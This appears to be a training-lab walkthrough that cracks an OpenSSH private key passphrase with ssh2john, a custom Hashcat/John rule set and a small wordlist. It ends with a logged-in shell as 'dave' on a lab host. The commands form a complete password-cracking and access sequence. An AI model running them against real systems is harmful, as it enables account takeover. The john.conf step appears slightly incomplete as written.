SSH Private Key Passphrase Cracking

Published on June 24, 2025

This walkthrough shows every command used to crack an OpenSSH private key passphrase.

1. Prepare Workspace and Download Files

cd ~/passwordattacks
wget http://192.168.50.201:8080/id_rsa
wget http://192.168.50.201:8080/note.txt
ls -l

Explanation: cd into your working directory; wget downloads the private key and note; ls verifies files and permissions.

cat note.txt

Explanation: Displays plaintext passwords and policy notes.

chmod 600 id_rsa

Explanation: Restricts key file to owner read/write, required by SSH.

ssh -i id_rsa -p 2222 dave@192.168.50.201

Explanation: Tries to use the key; prompts for passphrase (none match).

ssh2john id_rsa > ssh.hash

Explanation: JtR’s script transforms the key into a crackable hash.

cat ssh.hash

Explanation: Confirms the hash format; contains “$6$” for SHA-512 KDF.

hashcat -h | grep -i "ssh"

Explanation: Searches Hashcat help for “Private Keys ($6$)”; reveals mode 22921.

cat << 'EOF' > ssh.rule
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#
EOF

Explanation: c capitalizes first letter; $1 $3 $7 append digits “137”; $!,$@,$# append special chars.

cat << 'EOF' > ssh.passwords
Window
rickc137
dave
superdave
megadave
umbrella
EOF

Explanation: Contains candidate base passwords from the note.

hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force

Explanation: Hashcat errors “Token length exception” due to unsupported cipher (AES-256-CTR).

sudo sh -c 'cat ssh.rule >> /etc/john/john.conf'

Explanation: Adds named rules to john.conf, under [List.Rules:sshRules].

john --wordlist=ssh.passwords --rules=sshRules ssh.hash

Explanation: Uses sshRules and the custom wordlist; quickly finds Umbrella137!.

ssh -i id_rsa -p 2222 dave@192.168.50.201

Explanation: Enter passphrase Umbrella137!; gain shell access.